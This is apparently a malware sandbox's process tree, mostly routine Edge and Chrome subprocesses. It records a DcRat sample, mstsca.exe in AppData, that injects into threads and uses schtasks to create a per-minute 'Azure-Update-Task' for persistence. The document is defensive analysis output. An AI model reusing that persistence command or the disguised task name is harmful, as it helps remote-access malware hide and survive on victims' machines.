C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:22⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2592 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:32⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4932 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4068 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2440 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5544 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5716 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5460 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4972 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4972 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2468 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6088 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6092 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=2588 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6516 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5780 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2596 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6180 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5756 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4188 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3908 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5880 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7076 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7064 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6768 /prefetch:82⤵
-
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6192 /prefetch:2
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1336 /prefetch:8
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2872 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
  C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\windefender.exe
  C:\Windows\windefender.exe
C:\Windows\system32\AUDIODG.EXE
  C:\Windows\system32\AUDIODG.EXE 0x320 0x40c
C:\Users\Admin\Downloads\ProcessExplorer\procexp.exe
  "C:\Users\Admin\Downloads\ProcessExplorer\procexp.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  - Suspicious use of SetThreadContext
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Windows\SysWOW64\schtasks.exe
      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
      - DcRat
      - Creates scheduled task(s)
C:\Users\Admin\Downloads\ProcessExplorer\procexp.exe
  "C:\Users\Admin\Downloads\ProcessExplorer\procexp.exe"
C:\Users\Admin\Downloads\ProcessExplorer\procexp.exe
  "C:\Users\Admin\Downloads\ProcessExplorer\procexp.exe"
C:\Users\Admin\Downloads\Autoruns\autorunsc.exe
  "C:\Users\Admin\Downloads\Autoruns\autorunsc.exe"
C:\Users\Admin\Downloads\Autoruns\Autoruns.exe
  "C:\Users\Admin\Downloads\Autoruns\Autoruns.exe"
C:\Users\Admin\Downloads\Autoruns\Autoruns.exe
  "C:\Users\Admin\Downloads\Autoruns\Autoruns.exe"
C:\Users\Admin\Downloads\Autoruns\Autoruns.exe
  "C:\Users\Admin\Downloads\Autoruns\Autoruns.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  - Suspicious use of SetThreadContext
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Windows\SysWOW64\DllHost.exe
  C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
C:\Windows\explorer.exe
  C:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding
  - Modifies Internet Explorer settings
  - Modifies registry class
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefaultbd49a038h7b02h4fbeh8601hf6e67bc040da
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc6ba946f8,0x7ffc6ba94708,0x7ffc6ba94718
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,14969305814675071084,3473329563513418291,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:2
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,14969305814675071084,3473329563513418291,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1392 /prefetch:3
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  - Suspicious use of SetThreadContext
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\Downloads\Autoruns\Autoruns.exe
  "C:\Users\Admin\Downloads\Autoruns\Autoruns.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
  - Adds Run key to start application
  - Enumerates system info in registry
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xfc,0x10c,0x7ffc7af646f8,0x7ffc7af64708,0x7ffc7af64718
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,16045566515509987898,7697870980986531735,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:2
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,16045566515509987898,7697870980986531735,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2428 /prefetch:3
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,16045566515509987898,7697870980986531735,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2876 /prefetch:8
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,16045566515509987898,7697870980986531735,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,16045566515509987898,7697870980986531735,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2076,16045566515509987898,7697870980986531735,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4376 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
  C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Users\Admin\Desktop\procexp.exe
  "C:\Users\Admin\Desktop\procexp.exe"
C:\Users\Admin\Desktop\Autoruns.exe
  "C:\Users\Admin\Desktop\Autoruns.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  - Suspicious use of SetThreadContext
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\Desktop\procexp.exe
  "C:\Users\Admin\Desktop\procexp.exe"
C:\Users\Admin\Desktop\Autoruns.exe
  "C:\Users\Admin\Desktop\Autoruns.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe"
  - Enumerates system info in registry
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc7af24f50,0x7ffc7af24f60,0x7ffc7af24f70
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1648 /prefetch:2
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2012 /prefetch:8
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2420 /prefetch:8
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2932 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2920 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4656 /prefetch:8
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4768 /prefetch:8
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4896 /prefetch:8
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5112 /prefetch:8
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5188 /prefetch:8
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5168 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe
